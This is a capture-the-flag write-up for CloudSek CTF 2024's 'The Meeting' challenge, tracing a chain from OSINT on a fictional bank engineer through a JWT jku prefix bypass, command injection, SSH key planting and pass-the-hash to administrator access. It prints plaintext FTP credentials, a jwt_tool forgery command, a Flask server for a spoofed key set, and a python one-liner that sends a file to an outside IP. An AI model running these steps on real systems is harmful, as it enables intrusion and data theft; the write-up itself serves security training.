CloudSek CTF 2024 Writeup


In the CTF challenge “The Meeting,” the task was to recover a decryption key hidden by an attacker who had encrypted essential data at Elsoncare Bank.

The challenge began with OSINT on Venkatesh, a security engineer at the bank, whose Twitter profile revealed an email address. This led to discovering leaked FTP credentials via epieos.com. Using these credentials, I accessed an FTP server, where a conversation file disclosed the domain cloudsek.ctf. An Nmap scan revealed open services, and after modifying the /etc/hosts file, I accessed the web portal. The portal contained a JWT header injection vulnerability that allowed account takeover, which in turn led to command execution on the server. After exploiting this, I retrieved a capture.pcap file that hinted at SSH key additions on a Windows server. I then generated SSH keys and gained access to the Windows server. Inside, I located and exfiltrated the sam.hive and sys.hive files, used them to extract the NTLM hash of the Administrator, and successfully performed a pass-the-hash attack to obtain full control of the system, ultimately recovering the decryption key and completing the challenge.

The challenge began by identifying a key target: Venkatesh Ramkumar Naidu, a security engineer at Elsoncare Bank, who was known to be active on Twitter.

By locating his Twitter account, I found that his bio listed an email address: 1999venky.naidu@gmail.com.

This piece of information became the starting point for further OSINT investigation. Searching the internet for email OSINT tools turned up Epieos. Using Epieos, a specialized tool for email OSINT, I searched for information linked to this email address.

The tool revealed several Google services associated with the email, such as Google Maps and Google Calendar.

On the calendar, one event was available, named "Add Files To The Server".

In the event descriptions on the calendar, I discovered plaintext credentials for an FTP server:

FTP login Details
IP: 13.234.84.19
User: venknai
Password: xywwov-2zirBi-honqob

These credentials provided direct access to the FTP server within Elsoncare Bank’s infrastructure. With the FTP credentials in hand, I tried to connect to the FTP server.

The successful login indicated that the credentials were still valid. The server allowed access to a file named conversation.txt.

The conversation.txt file contained a discussion between Venknai and another individual referred to as Spidey.

The conversation revealed a domain name: cloudsek.ctf.

Running Nmap against 13.234.84.19 revealed three open ports:

FTP-21

SSH-22

HTTP-80

The web server could not be accessed via http://13.234.84.19/ using the bare IP address; the virtual host cloudsek.ctf had to be set.

I mapped the domain cloudsek.ctf to the FTP server’s IP address (13.234.84.19) by updating my /etc/hosts file.

Opening http://cloudsek.ctf/ in the browser showed the login page of the bank’s employee portal.

In the page’s source code, an endpoint named /s3cr3t was revealed in an HTML comment.

Checking that endpoint returned what looked like Python code, most likely the source code of the web app. Analyzing the code revealed the credentials of a guest account (line 38 of the source).

I logged in as guest while intercepting the request in Burp.

The response was just “Welcome, guest”, along with an auth cookie.

The auth cookie is a JWT, and the application fetches the keys used to verify it from http://13.234.84.19/.well-known/jwk.json. Further code review revealed a potential remote code execution (RCE).

This code was designed to execute commands when the username was admin. It checked for the presence of a domain parameter and, if found, used os.system to run a curl command containing that value. Any shell metacharacters injected via the domain parameter would therefore be executed. In addition to the command execution path, I reviewed the JWT token handling within the application. The JWT’s jku (JSON Web Key Set URL) header was only required to start with http://13.234.84.19.

This validation (line 57 of the source) was intended to restrict token verification to keys hosted at the server’s own IP address. However, a prefix check is easy to manipulate: by crafting a JWT with a jku value that begins with the expected string but points elsewhere, I could bypass the restriction and control which key set the server used to validate the token.

For example: http://13.234.84.19.mydomain.com/.well-known/jwk.json or http://13.234.84.19@IP.IP.IP.IP/.well-known/jwk.json (where IP.IP.IP.IP is the attacker-controlled host).
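As an added illustration (not code from the challenge or this writeup), the following puts the two weak checks described above, the prefix test on jku and the os.system curl built from the domain parameter, next to hardened forms; the curl options, the hostname rule and the function names are my assumptions.

```python
import re
import subprocess
from urllib.parse import urlparse

# Constructed example: each weak check the writeup describes, beside a hardened form.
TRUSTED_JKU = "http://13.234.84.19/.well-known/jwk.json"  # value from the writeup
HOSTNAME_RE = re.compile(r"(?=.{1,253}\Z)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}")

def weak_jku_ok(jku: str) -> bool:
    """The line-57 check as the writeup describes it: a bare prefix match."""
    return jku.startswith("http://13.234.84.19")

def strict_jku_ok(jku: str) -> bool:
    """Parse the URL and require every component to equal the pinned one.

    Rejects 13.234.84.19.mydomain.com (different host) and 13.234.84.19@host
    (userinfo in the netloc). Pinning the key set locally is safer still.
    """
    want, got = urlparse(TRUSTED_JKU), urlparse(jku)
    try:
        return (
            got.scheme == want.scheme
            and got.hostname == want.hostname
            and got.username is None and got.password is None
            and got.port == want.port  # .port raises ValueError on a junk port
            and got.path == want.path
            and not got.query and not got.fragment
        )
    except ValueError:
        return False

def weak_lookup_command(domain: str) -> str:
    """Shell string of the kind built for os.system; only built here, never run."""
    return f"curl -s http://{domain}/"

def safe_lookup_argv(domain: str) -> list:
    """Validate the hostname, then build an argv list; curl options are assumed."""
    if not HOSTNAME_RE.fullmatch(domain.lower()):
        raise ValueError("domain must be a plain DNS hostname")
    return ["curl", "-sS", "--max-time", "5", "--", f"http://{domain}/"]

def run_lookup(domain: str) -> str:
    """Run the hardened lookup with no shell involved (argv is passed verbatim)."""
    proc = subprocess.run(safe_lookup_argv(domain), capture_output=True, text=True, timeout=10)
    return proc.stdout
```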

After setting my Burp Collaborator domain in the jku using the method above, I got a callback from the server.

The server tried to fetch the JWKS from my host. This is broken authentication that can give us admin account access. I used the jwt_tool utility to exploit the vulnerability.

Run this command and follow along:

python3 jwt_tool.py <guest-account-cookie> -X s -ju <attacker-webserver-URL>

Here -X s selects the spoof-JWKS exploit and -ju sets the URL that the forged jku header will point to.

This gives us the JWK to host and a cookie signed as the admin user.

I set up a Flask server to serve the JWK with an application/json Content-Type header.

from flask import Flask, jsonify

app = Flask(__name__)

# JWK set as produced by jwt_tool; the key list is served under "mykeys"
JWK_RESPONSE = {
    "mykeys": [
        {
            "alg": "RS256",
            "use": "sig",
            "kty": "RSA",
            "kid": "jwt_tool",
            "e": "AQAB",
            "n": "uG6uq9Lf4z5nmrsA1byd-ydNm06m9XFP-eHaZxoK7ohqgyAlgK3jNn4bBBHmlBSqV2m6_x-U"
                 "EEMgkIYoGtiJoeKPXaDWqIdILDRirVW61048l0EPxQLc_PmB9tVtMR1QTIn19iQdROQYmeYZDHvLhIEl2T7Hlw"
                 "7auHsIdIrx6FlBxoA8ZhlsnorI8vppdPBXluZja-xeh7hDil5wVPVPf0PsITWmTYhdKdhjmsWG6Q",
        }
    ]
}

@app.route('/.well-known/jwk.json', methods=['GET'])
def get_jwk():
    # jsonify sets the Content-Type to application/json
    return jsonify(JWK_RESPONSE)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

We are good to go: we have the admin cookie from jwt_tool.

Replace the old auth cookie with the manipulated one in Burp.

We now have admin access, and as mentioned before, that gives us RCE through the domain parameter.

The backend server runs as appuser. To get a reverse shell, I used a Python one-liner.

We got access on the server as appuser.

After further enumeration, I found a capture.pcap file in the user’s home directory.

Let’s get it to our machine. There is no netcat on the server, so I transferred the file with a python3 one-liner:

python3 -c 'import socket; s = socket.socket(); s.connect(("4.188.73.150", 15913)); f = open("/home/appuser/capture.pcap", "rb"); s.sendall(f.read()); f.close(); s.close()'

After obtaining the capture.pcap file, I used Wireshark to analyze the network traffic.

During the analysis of the capture.pcap file, I observed network traffic indicative of an SSH management server. Specifically, I found HTTP requests sent to http://3.110.26.116/addkey, which included parameters for adding SSH keys. The requests were GET requests to /addkey carrying usr and key parameters.

This revealed that the server was set up to manage SSH keys via HTTP requests, allowing new keys to be added for the ncv user. This information was crucial for gaining further access to the compromised system.

I created a key pair for the user ncv with ssh-keygen and tried to add it to the server using curl.

ssh-keygen -f ncv -t rsa

The server could not be reached from my machine, so the request had to be sent from the compromised web server.

URL-encode the generated SSH public key, then run this curl command to add the key to the SSH server, but run it from the web server’s reverse shell:

curl -s 'http://3.110.26.116/addkey?usr=ncv&key=URL-ENCODE-KEY'

The response indicated that the key was added successfully.

Let’s SSH into the server.

ssh ncv@3.110.26.116 -i ncv

There were only two accounts present on the server: ncv and administrator.

After a little more enumeration, I found root.txt on the administrator’s desktop, along with SSH keys in the administrator’s .ssh folder, but neither was accessible as the ncv user.

The files sam.hive and sys.hive were present in the Temp directory of the ncv user, probably backups of the SAM and SYSTEM registry hives.

Let’s get those files onto our machine, but first we need to transfer netcat to the Windows SSH server.

Now use Impacket’s secretsdump tool to dump the NTLM hashes from these files.

In the “The Meeting” CTF challenge, I systematically addressed the ransomware attack on Elsoncare Bank by exploiting multiple vulnerabilities:

1. Initial Reconnaissance: I began by gathering OSINT on Venkatesh, a security engineer at the bank. This led me to his email and further discoveries, including an FTP server where I obtained crucial internal credentials.

2. Access To FTP Server: Accessing the FTP server with the leaked credentials allowed me to find sensitive data, including internal communications that pointed me towards the cloudsek.ctf domain.

3. Web Exploitation: On this domain, I discovered a command injection vulnerability through a hidden s3cr3t page. This flaw allowed me to execute arbitrary commands on the server. Analyzing the Python script on the server revealed that it was vulnerable to command injection. This vulnerability was exploited to run commands and further probe the server.

4. Analyzing Network Traffic: The capture.pcap file revealed an SSH management server at 3.110.26.116. The analysis showed that SSH keys could be added through HTTP requests to the server.

5. Accessing the SSH Management Server: By exploiting the identified SSH key management endpoint, I added my SSH key to the ncv user account. This allowed me to gain SSH access to the internal server.

6. Accessing SAM and SYSTEM Files: Once logged into the server as ncv, I located the sam.hive and system.hive files in the user’s temporary directory. I transferred these files to my local machine for further analysis. Using the impacket-secretsdump tool, I extracted NTLM hashes from the sam.hive file. This provided me with the necessary credentials for further exploitation.

7. PrivEsc to Administrator: With the NTLM hashes, I performed a pass-the-hash attack using evil-winrm to gain access as an administrator. This granted me full control over the server. Through these methodical steps, I successfully navigated the vulnerabilities, recovered critical data, and completed the challenge by securing access to the system.
